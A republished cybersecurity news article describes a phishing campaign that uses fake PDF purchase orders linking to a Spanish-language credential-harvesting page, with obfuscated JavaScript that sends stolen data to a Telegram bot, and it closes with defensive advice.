By rssfeeds-admin 
The malicious file, titled “NEW Purchase Order #52177236.pdf”, was first flagged after Malwarebytes blocked access to a suspicious link embedded within the document.
class="wp-block-heading" id="h-malicious-pdf-targets-business-emails">Malicious PDF Targets Business Emails
The PDF appeared to contain a purchase order button labeled “View Document”, adding a sense of legitimacy. However, hovering over the button revealed a long, deceptive URL hosted on the ionoscloud.com subdomain, a legitimate European cloud service provider.
Attackers are increasingly abusing reputable infrastructure such as IONOS Cloud, AWS, and Azure because domains from trusted providers are less likely to be automatically blocked by security software.
When the victim clicks the button, the link redirects to a fake PDF viewer hosted on a compromised website, which pre-fills the recipient’s email address in a login form. The page prompts users to log in with a “business email login,” tricking them into providing corporate credentials.
This broad prompt is meant to capture credentials that could unlock valuable enterprise accounts, such as Microsoft Outlook, Google Workspace, VPNs, or file-sharing systems.
The fraudulent site appeared in Spanish, beginning with the greeting “Estimado,” suggesting a regional focus on Spanish-speaking organizations.
Obfuscated JavaScript Sends Stolen Data to Telegram
Security researchers investigating the phishing infrastructure discovered a heavily obfuscated JavaScript file spanning over 113,000 lines of code.
Upon deobfuscation, the script revealed several layers that collected not only usernames and passwords but also additional metadata including browser type, operating system, language, screen size, IP-based geolocation, and even cookies.
Further analysis showed that the stolen data was transmitted directly to the attacker’s Telegram bot, using a hardcoded chat ID (5485275217).
Telegram’s encrypted messaging makes it a convenient hub for threat actors, enabling the instant relay of stolen information without maintaining their own servers.
Researchers also found multiple similar PDFs on VirusTotal that linked to the same IONOS Cloud subdomain, indicating the campaign’s wide distribution and the automated deployment of cloned phishing templates.
Staying Safe from PDF Phishing Traps
Organizations are urged to handle unsolicited purchase order attachments with caution. Verify such documents directly with the sender before opening or clicking on any embedded links.
Real-time protection tools like Malwarebytes Premium and Scam Guard can detect and block these malicious links. Using a password manager also helps prevent accidental credential entry on counterfeit sites.
Weaponized PDFs remain a persistent phishing tactic; one click can hand over your business credentials directly to cybercriminals.
Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
The post Watch Out for Weaponized PDF Purchase Orders Containing Hidden Malicious Scripts appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.